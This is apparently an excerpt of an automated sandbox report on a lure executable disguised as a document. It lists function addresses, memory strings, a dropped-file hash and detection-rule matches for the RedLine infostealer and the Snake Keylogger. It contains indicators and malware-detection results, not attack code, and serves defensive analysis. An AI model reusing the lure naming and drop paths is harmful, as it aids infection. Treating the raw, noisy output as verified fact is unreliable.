          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4B1109_2_37E4B110
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E477109_2_37E47710
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E47CD89_2_37E47CD8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4B6D89_2_37E4B6D8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4BCA09_2_37E4BCA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E482A09_2_37E482A0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E462B09_2_37E462B0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E454809_2_37E45480
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4D2809_2_37E4D280
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E488689_2_37E48868
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4C2689_2_37E4C268
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E400409_2_37E40040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4E0589_2_37E4E058
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4EE289_2_37E4EE28
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E48E309_2_37E48E30
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E406089_2_37E40608
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4D9619_2_37E4D961
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4E7309_2_37E4E730
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4AB399_2_37E4AB39
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4F5019_2_37E4F501
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E477029_2_37E47702
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4D2719_2_37E4D271
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4E0489_2_37E4E048
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E450209_2_37E45020
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E400069_2_37E40006
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E450109_2_37E45010
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_37E4EE189_2_37E4EE18
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380499649_2_38049964
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_38041DD89_2_38041DD8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380414F89_2_380414F8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_38040E109_2_38040E10
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380400409_2_38040040
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380407289_2_38040728
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_38047CF09_2_38047CF0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_38047CF89_2_38047CF8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380414E89_2_380414E8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_38040E009_2_38040E00
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_3804A1309_2_3804A130
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_3804A15B9_2_3804A15B
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_380407189_2_38040718
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_3813A9009_2_3813A900
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_3813B7B89_2_3813B7B8
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_2_381341D09_2_381341D0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00408C609_1_00408C60
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_0040DC119_1_0040DC11
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00407C3F9_1_00407C3F
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00418CCC9_1_00418CCC
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00406CA09_1_00406CA0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004028B09_1_004028B0
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_0041A4BE9_1_0041A4BE
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004182449_1_00418244
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004016509_1_00401650
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00402F209_1_00402F20
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004193C49_1_004193C4
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004187889_1_00418788
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00402F899_1_00402F89
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_00402B909_1_00402B90
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 9_1_004073A09_1_004073A0
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: 10_2_02AD20C410_2_02AD20C4
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\xzeheenC.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: String function: 029D8824 appears 45 times
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: String function: 029D87A0 appears 54 times
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: String function: 029C44AC appears 73 times
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: String function: 029C480C appears 931 times
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: String function: 029C44D0 appears 32 times
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: String function: 029C46A4 appears 244 times
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: String function: 0040FB9C appears 40 times
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: String function: 0040D606 appears 96 times
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: String function: 0040E1D8 appears 176 times
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: String function: 02AD46A4 appears 154 times
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: String function: 0294480C appears 619 times
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: String function: 02AD480C appears 619 times
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: String function: 029446A4 appears 154 times
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: String function: 029587A0 appears 48 times
          Source: C:\Users\Public\Libraries\Cneehezx.PIFCode function: String function: 02AE87A0 appears 48 times
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.00000000218D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.0000000021905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2278122938.0000000021A1C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020820000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.000000002089B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs D.G Governor Istek,Docx.exe
          Source: D.G Governor Istek,Docx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: 4.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 13.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 13.2.xzeheenC.pif.31d76478.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.31d76478.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1d270f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1d270f08.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.3092b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.3092b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1e32e790.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1e32e790.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.31dae790.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.31dae790.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.3092c896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.3092c896.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.370d0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.370d0000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 6.2.Cneehezx.PIF.21496c78.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 4.2.xzeheenC.pif.1e2f6478.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1e2f6478.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.31d76478.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.31d76478.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.342cb98e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.342cb98e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.30ca0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.30ca0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.330f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.330f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.30ca0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.30ca0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 13.2.xzeheenC.pif.3092c896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.3092c896.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 6.2.Cneehezx.PIF.21496c78.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 9.2.xzeheenC.pif.35556478.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.35556478.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.36aa0f08.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.36aa0f08.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.D.G Governor Istek,Docx.exe.21ab13d8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 4.2.xzeheenC.pif.1d270000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1d270000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 4.2.xzeheenC.pif.1e2f5570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1e2f5570.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
